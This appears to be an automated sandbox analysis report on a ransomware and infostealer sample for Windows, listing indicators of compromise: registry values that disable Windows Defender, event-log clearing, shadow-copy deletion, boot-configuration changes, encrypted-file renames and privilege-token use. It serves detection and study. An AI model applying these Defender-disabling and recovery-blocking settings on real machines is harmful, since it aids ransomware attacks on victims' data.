1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3

Analysis

max time kernel
114s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 04:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
Size

2.1MB
MD5

a0b0432294ebbc84d306993e2e7ea91c
SHA1

217f15f8048cb52b529bcad20c687422c9a29add
SHA256

1eb180ad160549d0754076d4230617fdcb22666e1708a0b8d37c8886a9f554f3
SHA512

1dc1884893156b400f5c9aa0c7a922ca6a06758771f70a560c82f2b3078ae2fde9b21b797236e4d7dcd3db866d3afee18b6acee3124224c5b0aca8376afced61
SSDEEP

49152:0Whc2Iyefi4Cvv5mGb9dPaBq9MuAp3JwMLerDclJyA:9Qq6gz95Ap3JBeAJyA

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
4548	wevtutil.exe
2372	wevtutil.exe
4492	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3360	bcdedit.exe
4956	bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.2140f8bb.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-64_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\freebxml.md.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_gzdHA4Zd52U0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\no_camera_dialog_image01.jpg	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\typing\bubble\light.gif	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.ELM.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_AJ0Jjx0z1Fo0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-200_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_444IVGCaesM0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-125_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_C8C-3gUlOa80.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\CoreEngine\Data\BrushProfile\BrushBump64.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_0DO4HmiJitU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_NJ6hzlu-Jqo0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-100.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_PF0aaOn40vA0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_qszqNfiC-H00.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_NinjaCat.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-48_altform-unplated_contrast-black_devicefamily-colorfulunplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.scale-125.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSquare310x310Logo.scale-100_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\AppxManifest.xml	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageLargeTile.scale-100_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription2-ppd.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_hZRknW8pYPU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_Tz5JaVqAKgM0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_altform-unplated_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-unplated_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_OWYQIwsG4Pw0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_-wKLmC67B4s0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_RqWFNaSxxu40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\resources.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreBadgeLogo.scale-200.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.png.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_4e26_dZXfiw0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-16_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\da-DK\View3d\3DViewerProductDescription-universal.xml	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-100_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\wiggle350.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\dismiss.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_altform-unplated.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_gxymKTfX3L00.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarSmallTile.scale-400.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_WHg_zerIVd40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_pK1QSayH9xA0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_SNnT2jWsyIE0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ClippingTool.targetsize-64.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\Assets\DeviceNotFound.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_mWVi0cJE2UY0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png.FNBFJFSshkD7V8LDNIrMTPOPDfe9_BiX2ennT_FDqE7_YAn99QdBQO40.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_BiX2ennT_FDqE7_VNX6T9i8OuU0.rwbwj	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-125_contrast-black.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\resources.pri	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\HelpAndFeedback\FeedbackThumbnail.png	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3528	sc.exe
4992	sc.exe
4200	sc.exe
3108	sc.exe
4316	sc.exe
2900	sc.exe
1496	sc.exe
2376	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2280	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4548	wevtutil.exe
Token: SeBackupPrivilege	4548	wevtutil.exe
Token: SeSecurityPrivilege	2372	wevtutil.exe
Token: SeBackupPrivilege	2372	wevtutil.exe
Token: SeSecurityPrivilege	4492	wevtutil.exe
Token: SeBackupPrivilege	4492	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	60	wmic.exe
Token: SeSecurityPrivilege	60	wmic.exe
Token: SeTakeOwnershipPrivilege	60	wmic.exe
Token: SeLoadDriverPrivilege	60	wmic.exe
Token: SeSystemProfilePrivilege	60	wmic.exe
Token: SeSystemtimePrivilege	60	wmic.exe
Token: SeProfSingleProcessPrivilege	60	wmic.exe
Token: SeIncBasePriorityPrivilege	60	wmic.exe
Token: SeCreatePagefilePrivilege	60	wmic.exe
Token: SeBackupPrivilege	60	wmic.exe
Token: SeRestorePrivilege	60	wmic.exe
Token: SeShutdownPrivilege	60	wmic.exe
Token: SeDebugPrivilege	60	wmic.exe
Token: SeSystemEnvironmentPrivilege	60	wmic.exe
Token: SeRemoteShutdownPrivilege	60	wmic.exe
Token: SeUndockPrivilege	60	wmic.exe
Token: SeManageVolumePrivilege	60	wmic.exe
Token: 33	60	wmic.exe
Token: 34	60	wmic.exe
Token: 35	60	wmic.exe
Token: 36	60	wmic.exe
Token: SeIncreaseQuotaPrivilege	4588	wmic.exe
Token: SeSecurityPrivilege	4588	wmic.exe
Token: SeTakeOwnershipPrivilege	4588	wmic.exe
Token: SeLoadDriverPrivilege	4588	wmic.exe
Token: SeSystemProfilePrivilege	4588	wmic.exe
Token: SeSystemtimePrivilege	4588	wmic.exe
Token: SeProfSingleProcessPrivilege	4588	wmic.exe
Token: SeIncBasePriorityPrivilege	4588	wmic.exe
Token: SeCreatePagefilePrivilege	4588	wmic.exe
Token: SeBackupPrivilege	4588	wmic.exe
Token: SeRestorePrivilege	4588	wmic.exe
Token: SeShutdownPrivilege	4588	wmic.exe
Token: SeDebugPrivilege	4588	wmic.exe
Token: SeSystemEnvironmentPrivilege	4588	wmic.exe
Token: SeRemoteShutdownPrivilege	4588	wmic.exe
Token: SeUndockPrivilege	4588	wmic.exe
Token: SeManageVolumePrivilege	4588	wmic.exe
Token: 33	4588	wmic.exe
Token: 34	4588	wmic.exe
Token: 35	4588	wmic.exe
Token: 36	4588	wmic.exe
Token: SeIncreaseQuotaPrivilege	4588	wmic.exe
Token: SeSecurityPrivilege	4588	wmic.exe
Token: SeTakeOwnershipPrivilege	4588	wmic.exe
Token: SeLoadDriverPrivilege	4588	wmic.exe
Token: SeSystemProfilePrivilege	4588	wmic.exe
Token: SeSystemtimePrivilege	4588	wmic.exe
Token: SeProfSingleProcessPrivilege	4588	wmic.exe
Token: SeIncBasePriorityPrivilege	4588	wmic.exe
Token: SeCreatePagefilePrivilege	4588	wmic.exe
Token: SeBackupPrivilege	4588	wmic.exe
Token: SeRestorePrivilege	4588	wmic.exe
Token: SeShutdownPrivilege	4588	wmic.exe
Token: SeDebugPrivilege	4588	wmic.exe
Token: SeSystemEnvironmentPrivilege	4588	wmic.exe
Token: SeRemoteShutdownPrivilege	4588	wmic.exe
Token: SeUndockPrivilege	4588	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 1060	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	93
PID 3912 wrote to memory of 1060	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	93
PID 1060 wrote to memory of 2672	1060	net.exe	96
PID 1060 wrote to memory of 2672	1060	net.exe	96
PID 3912 wrote to memory of 2008	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	97
PID 3912 wrote to memory of 2008	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	97
PID 2008 wrote to memory of 3168	2008	net.exe	99
PID 2008 wrote to memory of 3168	2008	net.exe	99
PID 3912 wrote to memory of 3592	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	100
PID 3912 wrote to memory of 3592	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	100
PID 3592 wrote to memory of 4664	3592	net.exe	102
PID 3592 wrote to memory of 4664	3592	net.exe	102
PID 3912 wrote to memory of 5044	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	103
PID 3912 wrote to memory of 5044	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	103
PID 5044 wrote to memory of 1468	5044	net.exe	105
PID 5044 wrote to memory of 1468	5044	net.exe	105
PID 3912 wrote to memory of 1368	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	106
PID 3912 wrote to memory of 1368	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	106
PID 1368 wrote to memory of 2960	1368	net.exe	108
PID 1368 wrote to memory of 2960	1368	net.exe	108
PID 3912 wrote to memory of 4488	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	109
PID 3912 wrote to memory of 4488	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	109
PID 4488 wrote to memory of 1940	4488	net.exe	111
PID 4488 wrote to memory of 1940	4488	net.exe	111
PID 3912 wrote to memory of 3464	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	112
PID 3912 wrote to memory of 3464	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	112
PID 3464 wrote to memory of 8	3464	net.exe	114
PID 3464 wrote to memory of 8	3464	net.exe	114
PID 3912 wrote to memory of 3604	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	115
PID 3912 wrote to memory of 3604	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	115
PID 3604 wrote to memory of 2368	3604	net.exe	117
PID 3604 wrote to memory of 2368	3604	net.exe	117
PID 3912 wrote to memory of 3528	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	118
PID 3912 wrote to memory of 3528	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	118
PID 3912 wrote to memory of 4992	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	120
PID 3912 wrote to memory of 4992	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	120
PID 3912 wrote to memory of 4200	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	122
PID 3912 wrote to memory of 4200	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	122
PID 3912 wrote to memory of 3108	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	124
PID 3912 wrote to memory of 3108	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	124
PID 3912 wrote to memory of 4316	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	126
PID 3912 wrote to memory of 4316	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	126
PID 3912 wrote to memory of 2900	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	128
PID 3912 wrote to memory of 2900	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	128
PID 3912 wrote to memory of 1496	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	130
PID 3912 wrote to memory of 1496	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	130
PID 3912 wrote to memory of 2376	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	132
PID 3912 wrote to memory of 2376	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	132
PID 3912 wrote to memory of 4832	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	134
PID 3912 wrote to memory of 4832	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	134
PID 3912 wrote to memory of 436	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	136
PID 3912 wrote to memory of 436	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	136
PID 3912 wrote to memory of 4156	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	138
